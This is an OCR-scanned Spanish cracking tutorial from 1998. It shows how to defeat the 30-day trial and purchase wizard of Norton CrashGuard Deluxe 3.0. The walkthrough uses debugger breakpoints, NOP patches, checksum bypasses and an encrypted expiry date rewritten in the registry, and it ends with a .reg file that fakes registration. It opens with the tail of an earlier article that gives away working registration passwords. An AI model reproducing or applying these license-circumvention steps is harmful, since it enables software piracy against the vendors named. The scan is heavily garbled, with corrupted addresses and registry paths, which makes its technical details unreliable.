Lancemos de nuevo el Softlce con Crtl+D y aparecemos en :444FOE ,aquí encontramos una pequeña comprobación, 
en ecx tenemos nuestra pass (para comprobarlo basta con poner d ecx) y en edx apuntamos a una zona de nuestro 
nombre, concretamente a "tado+Porcino"'. Esto no es exactamente lo qu buscamos, así que sigamos adelante con 
Crtl+D y aparecemos en :444EBO con una comprobación entre edx y ecx a través de al. Curiosamente edx apunta a 
nuestra pass y ecx apunta a Y2+cHdcBd6=DBC/P este churro es la pass correcta, si seguimos con Crtl+D 
aparecemos en el mismo sitio con edx apuntando a nuestra pass y ecx apunta a JWKTUUTH02166710 otra pass 
correcta. A lo largo de la evolución del programa desde sus primeras versiones, se ha cambiado 2 veces de generador 
de pass por cuestiones de seguridad, ¡qué estúpidos!. Por eso la doble comprobación, ver si nuestra pass es del 
antiguo generador o del nuevo. 


Eso es todo por ahora, no seais unos descerebrados y utilicéis mi pass, buscad la vuestra, es mu sencillote. 


Espero vuestras opiniones, sugerencias y ensayos en estadoporcinoO hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 
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MORALEJA 


INTRODUCCIÓN 


¡Saludos Familia! 


Bastante tiempo desde mi último artículo, lo sé, pero ya estamos de vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un poco 
de teoría y lo aprendido lo aplicaremos al programa Norton CrashGuard Deluxe 3.0 desde dos puntos de vista, el temporal y el de la password pa 
registrarse. 


TIPOS DE PROTECCIONES TEMPORALES. 


Demos un peque repaso a los diferentes esquemas de protección temporal que nos podemos encontrar (recomiendo la lectura del Capítulo 4.1 de 
+ORC) 


- CINDERELLA. El programa funciona durante una cierto periodo de días (digamos 15 días) comenzando desde la fecha de instalación. 


- BEST_BEFORE. El programa funciona durante una cierto período de tiempo independientemente de la fecha de instalación. El programa caduca 
el 30/12/97. 


- COUNTDOWN. El programa funciona sólo durante unos minutos o unos segundos. 


|- QUIVER. El programa funciona sólo durante un número determinado de ejecuciones. Realmente no es una protección temporal, pero su esquema 
de protección se parece mucho al de los otros tres tipos. 


[UN POCO DE TEORÍA 


¡Analizemos como funciona una protección temporal. 


[Los "inteligentes programadores" ofertan sus productos completos al público con ridículas protecciones. 
[Le colocan una fecha de caducidad, pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo las grandes compañías como Micro$oft, 
Corel, o Symantec. 


¡La idea es distribuir masivamenete sus productos aprovechando los estupendos canales de distribución que ofrecen las revistas de Soft. Una vez 
inundado el mercado, el usuario disfrutará del producto, se acostumbrará a él, hasta que le sea indispensable y tenga que comprarlo a un precio 
desorbitado . Esta táctica no es nueva, sino preguntad a algún camello, o como la CIA distribuyo la heroína entre el Black Power. 


Pensemos un poco. ¿Cómo conoce el programa que ya ha caducado el período de evaluación?. 

Supongamos que tenemos una evaluación e 15 días e instalamos nuestro programa el 1 de febrero. 

Sumando la fecha de instalación (1 Febrero) más el período de prueba se obtiene la fecha de caducidad:15 febrero (El día en el que lo instalas cuenta 
¡como día hábil). 

¡El programa, lo primero que calcula es si la fecha actual es menor o igual que la fecha de caducidad, y en tal caso, se ejecuta normalmente. 

Si es mayor, dará un bonito mensaje ''El período de evaluación ha expirado". 


¡Una cosa está clara, el programa debe guardar alguna de las dos fechas siguientes (o las dos): 


¡A - Fecha de Instalación y el período de evaluación. 


IB - Fecha de caducidad. 


¡Lo normal es la opción B. Al instalarse el programa, se calcula la fecha de caducidad y se guarda en algún sitio. Normalmente se guarda en el 
registro del sistema bajo algún nombre estúpido, aunque se puede guardar en el win.ini, system.ini, fichero oculto, o algún fichero que parezca 
linofensivo. Lo cierto es que debe guardarlo. 


¡Existe una variante, y es que la fecha de caducidad esté dentro del ejecutable. Un ejemplo lo tenemos en la evaluación del Hotmetal 4.0., del tipo 
¡BBEST_BEFORE, que dentro de su ejecutable aparecía 31/12/97. Madre de Mitra, qué estúpidos pueden llegar a ser los zombi-programadores. 
¡Dependiendo de la pericia del programador la fecha de caducidad puede estar o no encriptada para ocultarla de la vista del usuario y para que sea 
difícil modificarla. Resumiendo, el programa debe guardar la fecha de caducidad y comprobarla al inicio del programa con la fecha actual. 


[Ya sabemos de donde saca la fecha de cadudidad, pero, ¿de dónde saca la fecha actual?. Normalmente (el 99% de las veces) se extrae con una 
[llamada a la función getlocaltimeo o getsystemtime. Pero se puede extraer viendo la fecha de algún fichero que se modifique periódicamente como el 
¡system.dat o el bootlog.txt. 


¡Los puntos de ataque a este esquema son claros: 


- Atacar en el cálculo de la fecha de caducidad. 
¡En vez de sumar 15 días sumamos 15 siglos. Esta aproximación es difícil por que el cálculo se realiza una única vez, generalmente en la instalación. 


] de . 

|- Modificar la fecha de caducidad. 

Si la fecha está encriptada, necesitaríamos construir un algoritmo de encriptación para la nueva fecha que deseemos introducir. Por lo que en 
|¡general, puede ser complicado. 


|- Forzar la caducidad del programa. Se analizan los mensajes que da el programa y a partir de ellos se le sigue la pista hacia atrás. Es una táctica 
¡muy utilizada. 


|- Atacar en la comprobación de la fecha actual y la fecha de caducidad. Simplemente modifica la comprobación para que siempre estemos en el 
¡período de evaluación. Esta es una opción elegante. 


¡Alguien podría pensar que si se echa pa trás el reloj de W95, la protección temporal se elimina. Para evitar esta "trampilla", los programadores 
colocan código como el siguiente: 


SI está activada la marca de caducidad ENTONCES el programa ha caducado y se finaliza el programa 
¡DE LO CONTRARIO SI fechaActuabfechaCAducidad ENTONCES activar marca de caducidad 
| 


¡Como veis si os pasais de la fecha de caducidad, se activa una marca que impedirá que se ejecute el programa aunque modifiquéis el reloj. Esta 
marca se guarda en los mismos sitios donde se guarda la fecha de caducidad. 


A veces, la protección temporal queda eliminada introduciendo una palabra clave, por lo que a veces es más rápido atacar por la password. 


Para averiguar el fichero que contiene la protección temporal, se puede usar el Softlce y poner un bpx getlocaltime, o bien una nueva técnica, muy 
útil no sólo para protecciones temporales. 
Veámosla. 


[EN BUSCA DE LA FRASE MÁGICA 


'Todos los mensajes de un programa, los de error, los de felicitación, los de aviso, no son más que cadenas de caracteres que deben de residir en un 
[fichero. Para protecciones temporales es útil buscar mensajes como 'expire', 'demo', 'evaluation'. Si localizamos estos mensajes habremos localizado, 
[generalmente, el fichero que contiene la protección y podemos desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con buscar los 
¡mensajes 'unregistered', 'register' para localizar el programa con la protección en esquemas por palabra clave. Recomiendo una herramienta 
[excelente para buscar cadenas, es el programa sr32.exe, Search € Replace for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajáoslo y 
|crackearlo, tiene una bonita y sencillota protección del tipo CINDERELLA. 


[EL REGISTRO DEL SISTEMA 


El Registro del Sistema no es má que un fichero gigante (system.dat) donde W95 y el esto de los programas dejan sus miserias, osea, sus variables, 
[sus parámetros de configuración, su fecha de caducidad, sus marcas de caducidad. Muchos cracks sólo necesitan modificar adecuadamente el 
isystem.dat Es muy conveniente que le echéis un vistazo, aprenderéis mucho y podréis modificar muchos de los parámetros del Windoze. Para editar 
jel registro, se utiliza normalmente el programa regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo que lo ejecutéis con el 
[parámetro /v ,osease, co1windowsregedit /v 


(CÓMO CRACKEAR Norton CrashGuard Deluxe 3.0 


¡Objetivo: Norton CrashGuard Deluxe 3.0. 
Versión: 3.0 

¡Nombre del ejecutable: negd3w95.exe 
Website: http://www.symantec.com 
Tamaño del ejecutable: 11.964.671 bytes. 
Tipo de protección: Cinderella. 
Dificultad: Medio. 

¡Tiempo de crackeo: 2 horas. 
¡Herramientas: W32dasm8.X, SoftlIce. 


¡En esta ocasión, nuestro objetivo es una gran y abominable compañia, la Symantec y uno de sus muchos y abominables producto: Norton 
¡CrashGuard Deluxe 3.0 Básicamente, el programa consigue, en algunas ocasiones, que las aplicaciones que se cuelgan no bloqueen al Windoze. Cosa 
¡de agradecer dado el alto índice de siniestralidad de las aplicaciones y del propio Windoze. Además de tener una B.D de información sobre el PC, 
juna antivirus ... Se protege con protección temporal CINDERELLA de 30 días. 


[PRIMERA EXPLORACIÓN 


[Instalamos el programa y antes de finalizar la instalación ya nos pide que nos registremos, mal asunto, quieren cobrar antes de que probemos su 
¡producto, su codicia de palpa ante incluso de ver el programa. 


¡Una vez instalado, nos ha metido a escondidas varias cosas: 


| 2 . . . y . .. » . 
|- Una DII con un extraño nombre: 30vfv6vn.sys situada en el raiz de la unidad c: El nombre varía en cada instalación, sólo permanece fijo *fv6vn.sys, 
¡los 3 primeros caracteres son variables. Sospecho que sólo es un indicador para ver si el programa ya ha sido instalado. 


|- Una aplicación en el arranque del Windoze Norton CrashGuard Deluxe Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicación por dos 
veces con el nombre de checkup Su misión es detectar cualquier cambio en el reloj del sistema para bloquear inmediatamente la aplicación si nos 
¡pasamos de la fecha de caducidad. 


| 
Además se crean dos directorios Norton CrashGuard y Norton CrashGuard Deluxe y nos aparece un bonito icono en el escritorio del Windoze con 
¡forma de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si fuera poco, dos iconos en la barra de tareas, la aplicación 
[propiamemte dicha (escudo gris con una N en azul) y una historia de los cuelges de los programas (un reondel con una marca de verificación). 


¡[Si pulsamos en el icono del escritorio nos aparece una ventana donde nos dice que nos compremos INMEDIATAMENTE la aplicación a un precio 
fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el número de días que restan para el programa deje de funcionar. Además 
[aparecen unos bonitos botones en los que nos podemos registrar por Internet, probar el producto o cancelar. Si probamos el producto, aparece la 
ventana principal con todas pas opciones. Si elegimos la opción de registro, aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta 
de crédito. 


PRIMERA SORPRESA 
| 


| 
¡El sistema de pago no es de la propia Symantec, sino de la empresa Release Software Corporation:http://www.releasesoft.com) y su programa 
[SalesA gen. Es la primera vez y veo que Symantec no controle todos los aspectos de una aplicación. 


[SEGUNDA SORPRESA 


| 
| 
¡El fichero a estudiar es el Norton CrashGuardiegmain.exe (229.376 bytes) por una simple razón, tiene el único fichero que tiene el icono que el del 


[programa principal que aparece en la barra de tareas. Pero, en el mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936 bytes). 
[Mu raro, una librería aparentemente comprimida (y por tanto no utilizada) con un tamaño más grande que el ejecutable. Por que no está 
¡descomprimida la librería, ¿quizás por que no estamos registrados? :-) Además aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu 
[parecido al fichero del programa que estamos analizando cgmain.exe y tiene un icono que tiene las letras RS, que curioso, justo las Iniciales del la 
[empresa que dedica a comercializar el producto: Release Software. Si intentamos ejecutar cgmaipop.exe aparece que está preparando el Software. 
¡PREPARANDO?, ¿es que hay que precalentar los programas antes de instalarlos?. Luego aparece un mensaje de error indicando que no podemos 


¡ejecutar la aplicación, ¿quizás por que no estamos registrados? :-) 
| 


Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un nombre muy parecido al de la aplicación que queremos estudiar y 
laproximadamente con el mismo tamaño. Y el colmo, en el otro directorio, donde reside el menú de la aplicación Norton CrashGuard 
¡DeluxelCGDeluxe.exe aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll. Análogamente para Norton CrashGuard 
¡Deluxelcheckup.exe (el programa de testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll 


Todo esto huele a chamusquina, seguro que estos ficheros tienen algo que ver a la hora de registrar el programa, y como veremos en la segunda pate 
del artículo, tienen que ver y MUCHO. 


LA APROXIMACION DIFÍCIL 


AL ATAQUEEEEEEEEEEEEEE 


¡Podríamos analizar esos extraños ficheros que han aparecido, y lo haremos en la segunda parte del artículo. Ahora atacaremos formalmente a 
¡Norton CrashGuardicgmain.exe para analizar su esquema CINDERELLA de 30 días. 


¡Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5) 
¡Name: GetLocalTime . Bien, bien, asi que, aparentemente, está usando la tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza, 


[estaremos en plena rutina de comprobación de fecha: fechaActual»fecha de caducidad? 
| 


¡Solamente aparece la función getlocaltime que es utilizada una vez en el programa(¿por qué lo ponen tan fácil?) 


* Referenced by a CALL at Addresses: 
| :0040D5B4 , :0040DA44 , :0040DD3F'; La rutina es llamada 3 veces 


:0041E200 81ECCC000000 sub esp, 000000CC 
:0041E206 8D442410 lea eax, dword ptr [esp+10] 
:0041E20A 50 push eax 


* Reference To: KERNEL32.GetLocalTime, Ord:00F5h 


:0041E20B FF15BC544400 Call dword ptr [004454BC] 
:0041E211 8D4C2400 lea ecx, dword ptr [espl 
:0041E215 51 push ecx 


* Reference To: KERNEL32.GetSystemTime, Ord:0135h 


:0041E216 FF15B8544400 Call dword ptr [004454B8] 


¡Además aparece la llamada tambien a GetSystemTime. 
| 


[Tras la llamada a GetSystemTime los valores de año, mes, día,.... son extraídos de la pila y guardados en los registros :0041E21 mov dx, word ptr 
¡[[esp+0A] De los registros pasan a unas variables globales :0041E2AA mov dword ptr [0042F7F0], edx 


¡Recordad, cualquier posición de memoria fija como [0042F7F0], es utilizada como variable global por el programa. Despues se reintroducen en la 
[pila el año, el mes, el día,.... y se llama a la rutina :0041E310 call 00423420. 


¡En esta rutina es donde se realiza la encriptación de la fecha,al finalizar, devuelve en eax la fecha encriptada y además de guardarse en :0041E323 
¡mov dword ptr [ecx], eax 


| 
[Es más, las tres llamadas a :0041E200 obtendrán en eax la fecha encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo como es la 
[rutina de encriptación. Simplemente decir que utiliza la siguiente fórmula : 


t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+ 


(secondsDay*daysMonth[month))+(secondsY ear*(year-1900))+(secondsDay*(((year-1900)-1)/4)); fin=(t+fix Value); 


a es más fácil comparar un número que comparar años, días, meses,... por eso la fecha se transforma en un número. He construido un 
pequeño programa NORTON.EXE en C que realiza todo el proceso de encriptación de la fecha. Este programa esta incluido con la version en 
formato *.doc de este texto. Los fuentes de estos programas puedes bajarlos aqui. 


¡Bien, lo lógico, es que una vez encriptada la fecha se compruebe con la fecha de caducidad que debe estar encriptada. Si analizamos las tres llamadas 


la :0041E200 tenemos: 


* La llamada desde :0040D5BA, se limita a guardar la fecha encriptada :0040D641 mov dword ptr [esi+000002AC], eax 


[* La llamada desde :0040DA44, :0040DD3F hacen prácticamente lo mismo, mueven la fecha encriptada que estaba en eax a un registro, hacen una 
llamada a call 40DC40 y despues comprueban la fecha encriptada con [edi+00000284] 


[En concreto para la llamada desde :0040DD3F 


|:0040DD4B mov ebx, eax 

:0040DD62 push ebx 

:0040DD63 call 0040DC40 

:0040DD7B emp dword ptr [edi+00000284], ebx 
:0040DDBF ja 0040DDE4 


En concreto para la llamada desde :0040DA44 


:0040DA54 mov edi, eax 

:0040DAS5F push edi 

:0040DAG6O0 call 0040DC40 

:0040DAB2 cmp dword ptr [ebx+00000284], edi 
:0040DABS ja 0040DACE 


¡Esto suena a una doble comprobación temporal, serán desconfiados estos chicos. 


¿Pero que hace la llamada a call 0040DC407?, para ello cerramos el cgmain.exe: botón derecho sobre el icono de la N y el escudo y exit. Abrimos el 
loader del Softice y seleccionamos Norton CrashGuardiegmain.exe y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice, 
pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el 
programa y prestamos atención a ebx que es el que contiene la fecha encriptada. 


La llamada a call 0040DC40 simplemente realiza la siguiente comprobación 


:0040DC56 emp edx, eax; compara fechaAnterior,fechaActual 
:0040DC58 ja 0040DC64; Salta si eres un mal chico. 


fechaAnterior es la fecha encriptada el la que se arrancó por última vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200. Es 
una simple comprobación para ver si hemos echado para atrás el reloj. 


La comprobación 


cmp dword ptr [ebx+00000284], edi; Análogamente cmp dword ptr [edi+00000284], ebx 
[ja 0040DACE; Análogamente ja 0040DDE4 Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el período de prueba. 


LA FECHA DE CADUCIDAD 


La pregunta es, ¿de donde se guarda la fecha de caducidad encriptada? .Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha 
de encriptación se guarda en el registro del sistema y es recuperada por la llamada a la función :40BD89 RegqueryValueEXA. En concreto, se 
guarda en HKEY_CLASSES_ROOTWUItxfilelFormaAMSHAEZDO (write 


¡En mi caso, el valor de write es: 


¡01 02 03 04 05 06 07 08 


01 00 00 00 05 B7 FF FF F8 
02 00 00 00 00 00 00 10 00 
03 08 00 00 00 08 00 00 00 
04 00 00 00 06 B3 36 71 Al 
05 FB 0F 81 A5 20 80 00 06 


06 B7 9F A9 AO 00 00 00 00 
07 00 00 00 06 B3 36 71 AO 
08 C3 28 00 00 18 00 00 00 
09 00 00 00 00 00 


La fecha de caducidad está en write(5,7) hasta write(6,5) ambos inclusive. Lo curioso, es que la fecha está codificada, por ejemplo si la fecha de 
caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A00O. La rutina de encriptación está en :40C0D6 y se basa en la operación or 


1:0040C0D6 8A18 mov bl, byte ptr [eax] 


|[+0040C0D8 8A1l1 mov dl, byte ptr [ecx] 
1:0040C0DA C0E305 shl bl, 05 

|:0040CODD 48 dec eax 

1:0040C0DE COEAO3 shr dl, 03 

|:0040C0E1 49 dec ecx 

1:0040C0E2 OADA or bl, dl 

|:0040COE4 4E dec esi 

1:0040C0E5 885101 mov byte ptr [ecx+01], dl 
:0040C0E8 885901 mov byte ptr [ecx+01], bl 


¡He creado dos programas DECODE que decodifica el valor de write y CODE que codifica un valor de fecha para introducirlo en write. 
| 

|CHECKSUMS PARAINOCOS 

¡Los puntos de ataque son claros 


[L- Parchear las comprobaciones en el ejecutable. 
[2.- Introducir una fecha caducidad en el año 30000. 


11.- Si parcheamos el programa, se produce un error tan gordo que se casca windows. Esto se puede deber a que hemos crackeado mal obien exite un 
checksum. Para salir de dudas, basta con modificar alguna cadena de caracteres del ejecutable original Por ejemplo ''not be run in DOS mode" lo 
pasamos a "not be RUN in DOS mode", si se casca es que hay un checksum, como en este caso. 


Un checksum es una comprobación para ver si el ejecutable se ha modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y 
¡guardando este valor algún sitio (ejecutable, registro del sistema). El programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba 
la suma con el valor que tenía guardado. Si hay algún problema es que un virus o un cracker ha modificado el programa y esto nunca es bueno para 
¡el programador. 


En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos 
[parecía tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe encriptados (de ahí que tuvieran un tamaño tan parecido ambos ficheros). La 
¡rutina de checksum,simplemente consiste en coger de 16 en 16 los bytes del cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero 
cgmaitky.dll. Si existe alguna diferencia se produce un error de protección general y se casca todo. 


¡Para complicarlo todo, las rutinas de comprobación (ver si los 16 bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no están metidas en 
jun bucle, sino que estan a lo extenso. Es decir, hay una rutina de comprobación para los 16 primeros bytes, otra disinta para los 16 siguientes. Si 
queremos parchear el checksum, habrá que modificar unas 30 comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al checksum 
1:0040862D jne 00408695 si obligamos a saltar siempre, evitamos el checksum. PERO, ¿POR QUE EXISTE UN FLAG PARA EVITAR EL 


CHECKSUM?, ¿es que el programa cgmain.exe va a modificarse? Como veremos más tarde, así ocurrirá. 
| 


l>.- Con el programa NORTON se crea la fecha de caducidad que queremos, con el programa CODE se encripta y ya sólo hay que introducir el 
¡resultado en HKKEY_CLASSES_ROOTWItxfillFormaMSHAEZDO( write en las posiciones write(5,7),write(6,5) 


CHECKSUMS HASTA EN LA SOPA 


¡Cuando la fecha de caducidad ha vencido, el programa deja de funcionar parcialmente, si analizamos el porqué descubrimos que el byte 
¡[[esi+00000568] controla todo el meollo. En concreto, 


¡Si [esi+00000568] = 02 You cannot Run this Application 

Si [esi+00000568] = 20 Your computer application source has changed 
[Si [esi+00000568] = 08 Your free trial period is over 

¡Si [esi+00000568] = 04 OK 


Pero, ¿cómo se rellena este byte?. Siguiendo la pista hacia atrás descubrimos que se carga a partir de 
HKEY_CLASSES_ROOTWUItxfilelFormaAMSHAEZDOC open 


100 01 02 03 04 05 06 07 1 00 00 00 00 30 00 00 00 2 00 00 00 00 00 00 10 00 3 08 08 00 00 20 00 00 00 4 00 00 00 00 00 00 00 00 
En concreto de write(3,4). Hay que tener cuidado por que está encriptado, así que hay que utilizar el programa DECODE. Osea , si en write(3,4)=20 
lindica que al desencriptarlo [esi+00000568]=4. Si write(3,4)=40 la fecha de caducidad ha vencido. 


Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el programa replica diciendo que hemos trampeado los recursos. ¿QUE PASA 
AQUÍ?. 


¡Mu facil, HAY UN CHECKSUM en la sección HKEY_CLASSES_ROOTWUItxfillFormadMSHAEZDOC open. Estos es paranoico, un checksum en 
¡el propio registro del sistema. En concreto, el checksum está en write(1,4). Se deja como ejercicio localizar y destruir este checksum. 


[La MISMA PROTECCIÓN EN TODOS SITIOS 


[Aunque parezca increíble, los ficheros CGDeluxe.exe y CheckUp.exe tienen exactamente la misma protección que cgmain.exe y además en los 
mismos offset, osea en las mismas direcciones de memoria. Esto es extremadamente extraño, así que adoptaremos otra vía de ataque. 


LA APROXIMACIÓN FÁCIL 
Veamos lo que tenemos: 


- Unos ficheros extraños asociados a los ficheros importantes. Sabemos la función de uno de ellos los *tky.dll sirven de checksum, pero y el resto para 
¡que sirven? 


- Un flag que desactiva el checksum del ejecutable. 

- Unos misteriosos fichero ejecutables con el logo RS que dicen que tiene que prepara el Sotware. 
¡Nos centraremos en los ejecutables con los logos RS. 

¡REUNIENDO LAS PIEZAS 


Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero, CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una librería de un gran 
tamaño , CGDeluxe.dl_ ,y un ejecutable CGDelpop.exe que "prepara el Software". 


¡No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara" de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a 
¡CGDeluxe.EXE. Esta "preparación" sólo se realiza cuando estamos registrados. 


[Por tanto, se parte de un archivo ejecutable de un tamaño inferior a la versión completa del programa. Una vez realizado el proceso de compra se 
jactiva otro ejecutable que convierte la versión de prueba en versión completa . 


¡Todas las demás utilidades que acompañan al Norton CrashGuard Deluxe tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_, 
¡Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll) 


¡LA COMPRA VIRTUAL 


¡[Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en nuestra 'Primera Aproximación" : Doble click en el escudo con la N que 
¡hay en el escritorio y al pulsar el botón Buy Now (comprar ahora) aparece el asistente de compra. 


¡Este será nuestro punto de entrada. Si pensamos un poco observaremos que la aplicación que lanza el proceso de compra debe saber si la compra ha 
¡tenido éxito o no. Por tanto, será por aquí por donde centremos nuestros esfuerzos . Además debe de anunciar de alguna forma al resto de utilidades 
que la compra ha tenido éxito para que ellas también se ''preparen'" Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el icono 
[del escritorio) y observaremos como "compra". 


¡Nada mejor que usar un desensamblador para investigar el programa CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso 
[de la librería comercial RSAGNT32.DLL (encargada de realizar la compra virtual) y que existen un referencias a funciones tales como SAlnitialize, 
[startSalesAgent. Estas van a ser nuestras funciones de aproximación. 


¡Pulsamos en el botón de Imported Functions (Imp Fn) y hacemos doble click en la línea de rsagnt32.startSalesA gent. 


Aparecerá en el listado lo siguiente: 


* Reference To: rsagnt32.startSalesAgent, Ord:000Eh 


:00407834 E807F30000 Call 00416B40 f Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 
:00407844 742B je 00407871 


[Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que nos encontramos en un bloque de código que se encarga de cargar, iniciar, 
lejecutar, terminar el asistente de compra Buscamos donde puede empezar el bloque. Y un poco mas arriba encontramos: 


111111111//1// INICIO DE BLOQUE /////////////1// 
¡* Referenced by a CALL at Address: 


:00406752 fdesde aquí es llamado el bloque del asistente de compra 
:004077B0 A1B07B4300 mov eax, dword ptr [00437BB0] 

1:004077B5 53 push ebx 

* Reference To: rsagnt32.startSalesAgent, Ord:000Eh f Aquí hemos comenzado la busqueda 
:00407834 E807F30000 Call 00416B40 f Llamada al asistente 

:00407839 83C408 add esp, 00000008 


|:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 


:00407844 742B je 00407871 


:00407846 BFE0OA54300 mov edi, 0043A5E0 
|:00407878 5F pop edi 

:00407879 5E pop esi 

:0040787A 5B pop ebx 

:0040787B C3 ret 


1111111111//// FIN DE BLOQUE /////////////1// 


Ahora una vez que conocemos desde donde hemos llamado al bloque, usamos el menu Goto a Goto Code Location y escribimos el desplazamiento 
pS Aquí observamos lo siguiente: 


* Possible Reference to String Resource ID=00001: "Turnkexe" 


1:00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001 


|:00406752 E859100000 call 004077B0 f Entrada en el bloque anterior 
:00406757 66392D04254300 cmp word ptr [00432504], bp 

|:0040675E 0F84F4010000 je 00406958 

|:00406764 BF34254300 mov edi, 00432534 


¡Ummmm.... Aquí ya tenemos una bonita dirección de memoria (variable global) para usar con Softice.Pero antes añadamos la librería 
¡RSAGNT32.DLL. al la lista de dll que sabe manejar el Softice. 


Abrimos el Symbol Loader de Softice y en el menu Edita Softice Initialization SettingsaExports añadimos RSAGNT32.DLL. Abrimos el Symbol 
Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el Softlce: 


Bpx 406752 
Bpx startSalesA gent 


Pulsamos F5 y cuando aparezca la ventana de '"Welcome to Symantec Trialware'' pulsamos sobre el botón ''Buy Now"'. Aparecer en el Softice en el 
primer breakpoint Bpx 406752 


[Seguimos ejecutando, paramos en la función startSalesAgent 


cs:00407834 E807F30000 Call rsagnt32!startSalesAgent f Asistente de compra 
las:00407839 83C408 add esp, 00000008 

las:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

las:00407844 742B je 00407871 $ si salta, has comprado 


¡Nopeamos el asistente de compra. Esto es, sustituimos la llamada por instrucciones inonfesivas. En : 00407834 90 90 90 90 90 
| 


[Si estudiamos je 00407871 y hacemos que no vaya a la dirección 407871 aparece una ventana contándonos que se ha grabado un archivo llamado 
¡Rslicens.txt pero esto no hace que se active el proceso de compra, este nos es el camino. 


Otra comparación interesante se encuentra después de la rutina de entrada al bloque 


cs:00406752 E859100000 call 004077B0 $ Bloque anterior cs:00406757 66392D04254300 cmp [00432504], bp BComparación Interesante cs:0040675E 
0F84F4010000 je 00406958 cs:00406764 BF34254300 mov edi, 00432534 


¡Cuando nos encontremos sobre la dirección cs:0040675E cambiamos el flag de cero que estará activada (Z) y la colocamos a desactivada (Z). Ahora el 
programa seguirá en cs:00406764. Pulsemos FS y veamos que ocurre. 


Ha aparecido una ventana que nos dice que esperemos mientras nuestro programa esta siendo preparado (Please wait while your software is being 
prepared). Al fin, se "PREPARA EL SOFTWARE" 


Nota: Si el proceso anterior se repite muchas veces conviene que cerremos todos los programas que tengamos activo e incluso el mismo Norton 
Crashguard que tengamos en la barra de tareas. 


¡Una vez completado este proceso habremos comprado virtualmente el Norton crashguard Deluxe. 


¡Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y 
[LICENSE.xxxxxx (números de licencia) Este proceso realizado en tiempo real con el Softice no trae ningún problema... pero a la hora de hacer los 


[parches no encontraremos problemas con los checksum .Pero..TRANQUILOS QUE TODO TIENE SOLUCION. 
MODIFICANDO EL REGISTRO 


Usaremos una herramienta muy útil para los crackers el programa Regmonitor (si no lo tienes consíguelo) .Observamos unas variables que lee el 
programa (no registrado) al principio y tenemos: 


HKCRuultxfilelFormaAiMSHAEZDC write /* Esta nos suena */ 
HKCRuultxfilelFormadMSHAEZDCixilate 
HKCRuultxfilelFormaAMSHAEZDC open /* Esta nos suena*/ 


¡Bien, basta comparar los valores antes y después de ''preparar" el software, para darse cuenta que la única modificación la realiza en open. Cuando 
está registrado su valor es: 


HKEY_CLASSES_ROOT WltxfilelFormaAMSHAEZDCopen 
100 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00 
08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00 


¡Esta es la forma en que se comunica al resto de utilidades que la compra ya ha tenido éxito. 
Y YA ESTA, basta con introducir este valor en el registro para que quede registrado el Norton CrashGuard Deluxe 3.0 


MSHAEZDC corresponde al programa en cuestión a comprar. Usando el regmonitor vemos que clave busca el programa a desproteger y anotamos 
el código (MSHAEZDOC). 


Esta táctica se ha probado con éxito con las siguientes aplicaciones protegidas por la compañía Release Software Corporation : Norton utilities, 
Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder, 


¡Creando un archivo de registro ya tenemos hecho un crack no destructivo ya que no modifica ningún ejecutable. 


¡REGEDIT4 

; (ca) ESTADO+PORCINO 1998 

; Modificación de registro para Norton Crash Guard Deluxe 

; Mr.Red € otras hierbas 

[HKEY_CLASSES_ROOTVultxfilelFormatiMSHAEZDC] 
